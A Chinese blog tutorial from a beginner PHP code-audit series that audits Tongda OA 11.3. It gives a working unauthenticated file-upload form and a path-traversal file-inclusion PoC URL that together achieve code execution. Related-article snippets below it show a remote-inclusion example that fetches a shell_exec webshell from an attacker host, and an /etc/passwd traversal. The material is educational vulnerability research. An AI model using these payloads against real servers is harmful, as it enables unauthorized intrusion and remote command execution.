0基础PHP代码审计——第四天_文件上传&文件包含

最新推荐文章于 2024-07-17 20:43:03 发布
最新推荐文章于 2024-07-17 20:43:03 发布
阅读量468 收藏 9
点赞数 15
文章标签: php 开发语言 学习方法 经验分享 程序人生 生活
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39953838/article/details/135265443
版权

今天接着更行PHP的代码审计,今天还是挖掘和文件操作相关的。

一:环境工具准备

        PhpStorm。

        通达OA11.3版本

二:环境搭建

        下载安装程序后,直接运行安装。安装完成后会有一个控制面板。

        我们把源码在phpstorm中打开,发现是加密。我们搜索加密特征,进行解密。

        发现是zend加密,直接使用zend解密工具,完成解密后再打开,发现已经解密成功。

三:开始审计

        我们直接找到和文件有关的路径,打开看一看。

        根据代码我们这里看到了一个update方法,我们跟踪看一下。

        可以看到这里写了有过滤的一些操作,那这里应该就是文件上传的地方。

        我们看这个方法里都写了什么过滤。

        检查文件名变量 $ATTACHMENT_NAME 是否包含斜杠或反斜杠字符

        遍历文件上传数组 $_FILES,并根据条件判断获取相关的附件信息。在满足条件的情况下,将文件名、大小、错误码等存储到相应的变量中。

        下面的我们根据他代码中提示,基本就知道过滤了什么。

        upload方法看完后,我们再看文件上传的处理逻辑。

        这里变量$p接收POST方法提交的P值

        如果P为空,执行else部分,跳转到登录界面

        我们给P一个值,就能绕过登录界面。未授权访问。

        这里变量$TYPE接收POST方法提交的TYPE值

        这里变量$DEST_UID接收POST方法提交的DEST_UID值

        根据代码红框片段,我们可以知道当DEST_UID值为空,0,2的时候无效。

         给一个其他的值就可以绕过。

        第一个if检查是否至少有一个文件被上传。如果满足条件执行第二个。

        第二个if满足条件的话执行第三个。

        第三个使用urldecode对文件名字进行解码并与原始字符串长度进行比较。如果长度不相同说明文件名中包含了URL编码的字符,将解码后的结果重新赋值。

        接着使用uoload方法进行文件上传,并将返回的结果赋给 $ATTACHMENTS

   下面检查 $ATTACHMENTS是否为数组。如果不是数组,则表示文件上传失败。

        如果$_FILES小于1,则无文件上传。

        

        分析完上传处理逻辑,我们自己构造一个上传页面。

<html>
<body>
<form action="http://127.0.0.1/ispirit/im/upload.php" method="post" enctype="multipart/form-data">
<input type="text"name="P" value=1></input>
<input type="text"name="UPLOAD_MODE" value=1></input>
<input type="text" name="DEST_UID" value=1></input>
<input type="file" name="ATTACHMENT"></input>
<input type="submit" ></input>
</body>
</html>

        这里我们文件上传成功,但是不知道路径。

        我们使用文件监控脚本,看看文件上传到哪里了。将监控脚本放在根目录运行,然后重新上传。

        通过文件监控脚本,我们找到了上传的位置。

        

        文件是上传上去了,但是我们执行不了里面的php代码,我们尝试用文件包含去执行,文件包含会把执行里面的PHP代码。

        我们全局搜include_once,找到可控变量的地方。路径为ispirit\interface\gateway.php

        首先检查$url是否为空,然后接着往下执行,第二个if中如果变量$url包含其中任意一个子字符串,则执行包含操作,文件路径由$url来控制。

       

        因此我们构造poc。

/ispirit/interface/gateway.php?json={}&url=/general/../../attach/im/2312/1112568663.123.png

        post提交命令,成功执行。

最后:

遇见你之前,不知道什么叫喜欢,遇见你之后,不知道什么叫喜欢。

        

想吃冰淇淋!
关注
  • 15
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PHP 代码审计 (文件上传)
CSDN
08-03 1万+
这里是条件竞争,先将文件上传到服务器,然后判断文件后缀是否在白名单里,如果在则重命名,否则删除,因此我们可以上传1.php只需要在它删除之前访问即可,可以利用burp的intruder模块不断上传,然后我们不断的访问刷新该地址即可。白名单就是允许上传某种类型的文件,该方式比较安全,抓包上传php后门,然后将文件名改为.jpg即可上传成功,但是有时候上传后的文件会失效无法拿到Shell.代码中验证了上传的MIME类型,绕过方式使用Burp抓包,将上传的一句话小马。然后,选择特殊字符,右击。
PHP代码审计文件上传
小千安全
10-12 351
_FILES$_FILES['uploadFile']['name'] 客户端文件的原名称。$_FILES['uploadFile']['type'] 文件的 MIME 类型,例如"image/gif"。$_FILES['uploadFile']['size'] 已上传文件的大小,单位为字节。$_FILES['uploadFile']['tmp_name'] 文件被上传后在服务端储存的临时文件名,一般是系统默认。可以在php.ini的upload_tmp_dir指定。
PHP代码审计文件包含
秋水的博客
09-08 1519
目录 漏洞简介 漏洞实现 文件包含之伪协议 漏洞实例 漏洞防御 漏洞简介 什么是文件包含? 在之前接触的python中,我们会通过import来导入一些公共资源 在PHP中,也有类似的函数,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码 文件包含分文本地文件包含(Loacl File Inclusion,LFI...
PHP代码审计基础文件上传漏洞
1匹黑马
11-28 454
文章目录漏洞原理危害漏洞条件文件上传的可控点挖掘思路相关函数move_uploaded_file 漏洞原理 文件上传漏洞一些web应用程序中允许上传图片,文本或者其他资源到指定的位置。 文件上传漏洞就是利用网页代码中的文件上传路径变量过滤不严将可执行的文件上传到一个到服务器中,再通过URL去访问以执行恶意代码。 危害 上传漏洞与SQL注入或 XSS相比 , 其风险更大 , 如果 Web应用程序存在上传漏洞 , 攻击者上传的文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行
PHP-代码审计-文件上传
weixin_44110913的博客
08-28 434
函数 move_uploaded_file move_uploaded_file ( string $filename , string $destination ) : bool $filename 上传的文件的文件名。 $destination 移动文件到这个位置。 本函数检查并确保由 filename 指定的文件是合法的上传文件(即通过 PHP 的 HTTP POST 上传机制所上传的)。如果文件合法,则将其移动为由 destination 指定的文件。 move_uploaded_
第52天:代码审计-PHP项目类RCE及文件包含下载删除1
08-03
本文主要探讨了PHP项目中常见的安全漏洞类型,包括远程代码执行(RCE)、文件包含、下载、删除等,并提供了相关的漏洞利用关键字和实例分析。 首先,SQL注入是由于不当处理用户输入导致的数据库操作漏洞。关键词如`...
php.rar_login file_php 登陆_php作业_specifick8y_文件上传
09-24
综上所述,这个PHP作业项目涵盖了Web开发基础知识,包括PHP语法、数据库操作(如MySQL)、用户身份验证、文件上传和可能的验证码技术。它为学习者提供了一个实践这些概念的平台,帮助他们理解如何在实际项目中运用...
基础篇】第08篇:PHP代码审计笔记--任意文件下载漏洞1
08-03
PHP代码审计笔记--任意文件下载漏洞1 该漏洞是由于文件名及路径由客户端传入的参数控制,并且未进行有效的过滤,导致用户可恶意下载任意文件。攻击者可以提交url:test.php?filename=test.php,即可下载test.php...
基础篇】第04篇:PHP代码审计笔记--任意文件上传1
08-03
GitHub项目地址:https://github.com/c0ny1/upload-labsjs判断文件上传文件类型,抓包绕过文件类型匹配,抓包修改Conte
php代码审计【15】文件上传
司徒荆的博客
06-30 387
漏洞条件:文件可上传——知道文件上传路径——上传文件可以被访问——上传文件可以被执行
PHP代码审计 -- 文件上传
qq_46635165的博客
12-15 978
工具&环境 工具:Seay源代码审计系统,文本编辑器一个 环境:phpstudy,网站源码是 zbzcms 步骤 1, 将zbzcms网站源码放入phpstudy,根据网站安装引导完成网站搭建; 2,打开Seay,新建项目 --> 选择网站源码 --> 自动审计,审计完成后点击 漏洞描述对审计结果进行排序,方便结果查看: 3,审计完成,关注存在文件上传这一类,对结果进行观察,一般存在文件上传的地方存在upload,include,up等关键词,然后再看,发现也有文件上传在admin目录
PHP代码审计7—文件上传漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-01 3262
文件上传基础整理与示例分析
ns3-gym入门(二):linear-mesh例子详解
zoe2222226666的博客
07-15 888
学习ns3-gym中关于IEEE 802.11网状网络中控制随机接入的例子linear-mesh
喰星云·数字化餐饮服务系统 多处 SQL注入漏洞复现
0xSec
07-14 460
喰星云·数字化餐饮服务系统 not_out_depot.php、shelflife.php、not_finish.php、stock.php等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
【框架】PHP框架详解-symfony框架
Xiaoxin的博客
07-16 812
1. 起源与开发者Symfony由SensioLabs(现为Symfony公司)开发,最初由Fabien Potencier于2005年创建。Symfony框架自发布以来,经历了多个版本的迭代,每个版本都引入了新的特性和改进,以满足不断变化的Web开发需求。2. 设计理念Symfony框架遵循MVC(Model-View-Controller)设计模式,将应用程序分为模型、视图和控制器三个核心部分,有助于实现代码的分离和重用。
PHP框架详解:Symfony框架
最新发布
qq_72290695的博客
07-17 330
Symfony是一个基于MVC(模型-视图-控制器)架构的PHP框架,致力于加速Web应用的开发与维护。它提供了一整套可重用的PHP组件和工具,使开发者能够构建高效、可扩展和可维护的应用程序。
深入探索Laravel框架中的Blade模板引擎
2402_85762143的博客
07-14 782
Blade是Laravel框架自带的模板引擎,它允许你使用纯PHP代码来编写HTML模板。Blade的语法非常简洁,它使用双大括号{{ }}来输出数据,使用三组大括号!!!来输出未转义的HTML内容,以及使用符号来定义控制结构,比如@foreach@if等。
昇思25天学习打卡营第15天|ResNet50迁移学习
ptyp222的博客
07-15 492
本章依然使用了ResNet50网络模型,完成了狼狗图片分类任务。
服务器端文件包含,btslab全攻略——注入之远程文件包含&服务器端包含
05-22
远程文件包含(Remote File Inclusion,RFI)和服务器端文件包含(Server Side Include,SSI)是常见的Web应用程序漏洞,攻击者通过利用这些漏洞可以获取网站服务器上的敏感信息,甚至控制整个服务器。下面我来介绍一下这两种漏洞。 一、远程文件包含 远程文件包含是指攻击者通过Web应用程序加载远程托管的文件,这些文件可能包含恶意代码,攻击者可以利用这些代码执行各种攻击,例如窃取敏感信息、控制服务器等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载远程的evil.txt文件,并执行其中的代码。攻击者可以在evil.txt中写入任意的PHP代码,例如: ``` <?php echo shell_exec($_GET['cmd']); ?> ``` 这段代码会执行用户传入的cmd参数,并将结果输出,攻击者可以通过以下URL执行任意的系统命令: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt&cmd=ls%20-la ``` 二、服务器端文件包含 服务器端文件包含是指Web应用程序在处理动态内容时,将用户输入作为文件名或路径名进行处理,攻击者可以利用这个漏洞访问其他文件中的代码,例如配置文件、用户数据等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=../../../etc/passwd ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载/etc/passwd文件,并将其中的内容输出到页面上,攻击者可以通过这种方式获取敏感信息。 总结 要防止远程文件包含和服务器端文件包含漏洞,应该对所有用户输入进行过滤和验证,避免用户输入作为文件名或路径名进行处理。应用程序应该使用白名单机制,仅允许访问特定目录下的文件,而不是允许任意文件的访问。此外,应用程序应该启用PHP的安全模式,禁止执行外部命令、禁止访问网络等操作,以提高安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值